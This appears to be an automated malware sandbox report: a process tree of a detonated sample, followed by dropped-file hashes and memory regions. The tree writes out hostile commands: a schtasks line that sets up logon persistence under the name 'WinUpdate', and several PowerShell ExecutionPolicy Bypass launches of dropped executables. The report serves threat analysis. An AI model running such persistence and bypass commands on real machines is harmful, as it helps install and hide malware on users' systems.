                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4152
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:2632
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:3708
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBE5E.tmp.bat""
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3584
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2572
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout 3
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2556
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinUpdate.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
                                                                                                    5⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2028
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"' & exit
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4628
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        7⤵
                                                                                                          PID:4212
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"'
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4308
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\pwtleb.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\pwtleb.exe"
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4704
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"' & exit
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5612
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:5628
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"'
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5788
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uehcxd.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\uehcxd.exe"
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:6040
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                9⤵
                                                                                                                  PID:6060
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"' & exit
                                                                                                            6⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5216
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                                PID:5252
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"'
                                                                                                                7⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4852
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\xkpenf.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\xkpenf.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3352
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3616
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:3836
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                        PID:4020
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4236
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                          1⤵
                                                                                                            PID:4872
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                            1⤵
                                                                                                              PID:4908
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:1892
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                  PID:4876
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2164
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1688
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:2668
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:2996
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                        1⤵
                                                                                                                          PID:4088
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:2784
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4056
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:1380
                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                1⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:2764

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                Filesize

                                                                                                                                1KB

                                                                                                                                MD5

                                                                                                                                5315900105942deb090a358a315b06fe

                                                                                                                                SHA1

                                                                                                                                22fe5d2e1617c31afbafb91c117508d41ef0ce44

                                                                                                                                SHA256

                                                                                                                                e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

                                                                                                                                SHA512

                                                                                                                                77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                15KB

                                                                                                                                MD5

                                                                                                                                8c9c9827e721681ee368604488cad501

                                                                                                                                SHA1

                                                                                                                                82661175f3b2df101f3290c83e8be1ea3e3242be

                                                                                                                                SHA256

                                                                                                                                fde6710d3d7d4ee68941e98d452edd6d29716fc5642bcf18c3c023011f20f8d6

                                                                                                                                SHA512

                                                                                                                                241f7052bcfb909fb7ce920aa0b64325ad6364b6d80939e1d496ffbfe6d21f91ae7a4494a3d309f107d11aea31c109808663f2a8463cd41fae5d0b54987aef29

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                15KB

                                                                                                                                MD5

                                                                                                                                d28bb0b1d7c3bf12b7d210f51b018033

                                                                                                                                SHA1

                                                                                                                                00498b38cb4501f78d6e0412ebe13ffc4012a81f

                                                                                                                                SHA256

                                                                                                                                f1dfc4e80adf2b3861fcc97e390375c970cd5aca54b645010473aa650bf1a444

                                                                                                                                SHA512

                                                                                                                                e48d3cb68c02d869262a4058364805e6ecf1642a09b39c90daeff293b58a99eb9c774a764d80246b01d0b23c828c927b4f7d704003edab4dcc1e8a0e69f3b7a2

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                944B

                                                                                                                                MD5

                                                                                                                                9b80cd7a712469a4c45fec564313d9eb

                                                                                                                                SHA1

                                                                                                                                6125c01bc10d204ca36ad1110afe714678655f2d

                                                                                                                                SHA256

                                                                                                                                5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

                                                                                                                                SHA512

                                                                                                                                ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\$77svchost.exe

                                                                                                                                Filesize

                                                                                                                                45KB

                                                                                                                                MD5

                                                                                                                                a44a767dba207c04c74afae17144f787

                                                                                                                                SHA1

                                                                                                                                fa14f38216e259be5b181c825719f1c864691a5f

                                                                                                                                SHA256

                                                                                                                                26eaa5bce06cadc54cb4990fabb1b9150966ef720b07a836ef2bd456360246b2

                                                                                                                                SHA512

                                                                                                                                7dfd6e182ac9f16b29843cb0eabaa7db02fa3ee59c65c7822d9213859c4a7185d0fdcd1d51747a11b4fdd3a7947ea14fdc7fa583c13b4d3edf50b8d6d3178619

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Install.exe

                                                                                                                                Filesize

                                                                                                                                163KB

                                                                                                                                MD5

                                                                                                                                1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                                SHA1

                                                                                                                                2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                                SHA256

                                                                                                                                b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                                SHA512

                                                                                                                                859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pwtleb.exe

                                                                                                                                Filesize

                                                                                                                                661KB

                                                                                                                                MD5

                                                                                                                                2513e26d91a03e8fbcbfd8c3f4f11f80

                                                                                                                                SHA1

                                                                                                                                dabc1fc063c86d28d6b3313cbed51334bc90a0e0

                                                                                                                                SHA256

                                                                                                                                c62bc8ed1192add4a2ce16af0fe67dfe6a061b85c1176648a3ad9856b1744966

                                                                                                                                SHA512

                                                                                                                                56b55eefc9277ba83ba1f1b7fad87166a6d5b85266be5f4a3f35cd9af36a0f0c2c51011d3f6ed5acbf8f710fe7858ce81dc09878b1f791230795f0088f29e404

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpBE5E.tmp.bat

                                                                                                                                Filesize

                                                                                                                                153B

                                                                                                                                MD5

                                                                                                                                9e367c9a5864026a9e22e7fae8fad3d9

                                                                                                                                SHA1

                                                                                                                                a5a133f024194d99ee7a56f7444680b9da9452fa

                                                                                                                                SHA256

                                                                                                                                35ef41a342091f14ba17bddb28cfe21db2716b08c903a8c8a3cabd76fadb707b

                                                                                                                                SHA512

                                                                                                                                11ef216cce3f7f653e75d9fd0191f85fd345319509ca653912d28847f946c82da626cb531d6b9eebe0dcfd3574eaa1ba6543b42c1caa041f3cb2e31040aa8522

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\uehcxd.exe

                                                                                                                                Filesize

                                                                                                                                95KB

                                                                                                                                MD5

                                                                                                                                bcbcb79606c1833ccef6ca77a7535936

                                                                                                                                SHA1

                                                                                                                                0fcbf9cd7ad1963736afac84cc56069654df3d42

                                                                                                                                SHA256

                                                                                                                                ce13808dad8149017d9dbc146681a99cd79aaa1288f890c9120a47c347c9db29

                                                                                                                                SHA512

                                                                                                                                20a3aa8046c8e3c93a9a55aa3750088da247abb11444883f8463aef0d347520c697067b5a8491de204310660cdb632b828d58898e4f65fd385cb1ec2da752391

                                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_zysk5fpe.gmq.ps1

                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                SHA1

                                                                                                                                445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                SHA256

                                                                                                                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                SHA512

                                                                                                                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                1KB

                                                                                                                                MD5

                                                                                                                                aa187cac09f051e24146ad549a0f08a6

                                                                                                                                SHA1

                                                                                                                                2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                                SHA256

                                                                                                                                7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                                SHA512

                                                                                                                                960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                              • memory/464-173-0x0000028411090000-0x00000284110BB000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/484-162-0x0000021946DE0000-0x0000021946E0B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/484-168-0x0000021946DE0000-0x0000021946E0B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/484-169-0x00007FFCD86F0000-0x00007FFCD8700000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/640-127-0x0000021C02790000-0x0000021C027B5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                148KB

                                                                                                                              • memory/640-128-0x0000021C027C0000-0x0000021C027EB000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/640-129-0x0000021C027C0000-0x0000021C027EB000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/640-136-0x00007FFCD86F0000-0x00007FFCD8700000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/640-135-0x0000021C027C0000-0x0000021C027EB000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-146-0x000001B229AE0000-0x000001B229B0B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-140-0x000001B229AE0000-0x000001B229B0B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/692-147-0x00007FFCD86F0000-0x00007FFCD8700000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/704-113-0x00007FFD172A0000-0x00007FFD1735E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/704-112-0x00007FFD18670000-0x00007FFD18865000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/704-101-0x000001A619E80000-0x000001A619EA2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/704-111-0x000001A6346F0000-0x000001A63471A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/980-158-0x00007FFCD86F0000-0x00007FFCD8700000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/980-157-0x0000011839E40000-0x0000011839E6B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/980-151-0x0000011839E40000-0x0000011839E6B000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                172KB

                                                                                                                              • memory/1436-114-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-115-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-116-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-117-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-119-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-124-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1436-121-0x00007FFD172A0000-0x00007FFD1735E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/1436-120-0x00007FFD18670000-0x00007FFD18865000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/2028-873-0x0000000005C40000-0x00000000061E4000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.6MB

                                                                                                                              • memory/2028-890-0x0000000006970000-0x00000000069D2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                392KB

                                                                                                                              • memory/2028-871-0x0000000000710000-0x0000000000722000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/2028-874-0x0000000005740000-0x00000000057A6000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                408KB

                                                                                                                              • memory/2028-891-0x0000000006AA0000-0x0000000006ABE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                120KB

                                                                                                                              • memory/2028-889-0x00000000069F0000-0x0000000006A66000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                472KB

                                                                                                                              • memory/2128-99-0x0000000074CBE000-0x0000000074CBF000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/2128-100-0x0000000000EC0000-0x0000000000ED2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/2128-785-0x0000000005960000-0x00000000059FC000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                624KB

                                                                                                                              • memory/2856-9864-0x0000000140000000-0x00000001400AA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                680KB

                                                                                                                              • memory/3688-0-0x0000000000400000-0x0000000000453000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                332KB

                                                                                                                              • memory/4308-962-0x0000000006AF0000-0x0000000006B86000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                600KB

                                                                                                                              • memory/4308-957-0x0000000006510000-0x000000000652E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                120KB

                                                                                                                              • memory/4308-956-0x0000000005F30000-0x0000000006284000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                3.3MB

                                                                                                                              • memory/4308-950-0x0000000005E50000-0x0000000005EB6000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                408KB

                                                                                                                              • memory/4308-944-0x0000000005DB0000-0x0000000005DD2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/4308-936-0x00000000056A0000-0x0000000005CC8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                6.2MB

                                                                                                                              • memory/4308-963-0x00000000069F0000-0x0000000006A0A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                104KB

                                                                                                                              • memory/4308-932-0x0000000004F30000-0x0000000004F66000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                216KB

                                                                                                                              • memory/4308-958-0x0000000006550000-0x000000000659C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                304KB

                                                                                                                              • memory/4308-964-0x0000000006A40000-0x0000000006A62000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/4704-5035-0x0000023D40350000-0x0000023D403A4000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                336KB

                                                                                                                              • memory/4704-4975-0x0000023D27D50000-0x0000023D27D9C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                304KB

                                                                                                                              • memory/4704-4974-0x0000023D27CF0000-0x0000023D27D46000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                344KB

                                                                                                                              • memory/4704-983-0x0000023D40240000-0x0000023D4034A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/4704-978-0x0000023D25CC0000-0x0000023D25D6A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                680KB

                                                                                                                              • memory/4852-5190-0x00000000057B0000-0x0000000005B04000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                3.3MB

                                                                                                                              • memory/5616-5867-0x0000016E18720000-0x0000016E187CA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                680KB

                                                                                                                              • memory/5788-5029-0x0000000006430000-0x0000000006784000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                3.3MB

                                                                                                                              • memory/6040-5064-0x0000000000350000-0x000000000036E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                120KB

                                                                                                                              • memory/6040-5080-0x00000000050A0000-0x00000000051AA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/6040-5079-0x0000000002BE0000-0x0000000002C2C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                304KB

                                                                                                                              • memory/6040-5078-0x0000000002C50000-0x0000000002C8C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                240KB

                                                                                                                              • memory/6040-5077-0x0000000000BA0000-0x0000000000BB2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/6040-5076-0x00000000054C0000-0x0000000005AD8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                6.1MB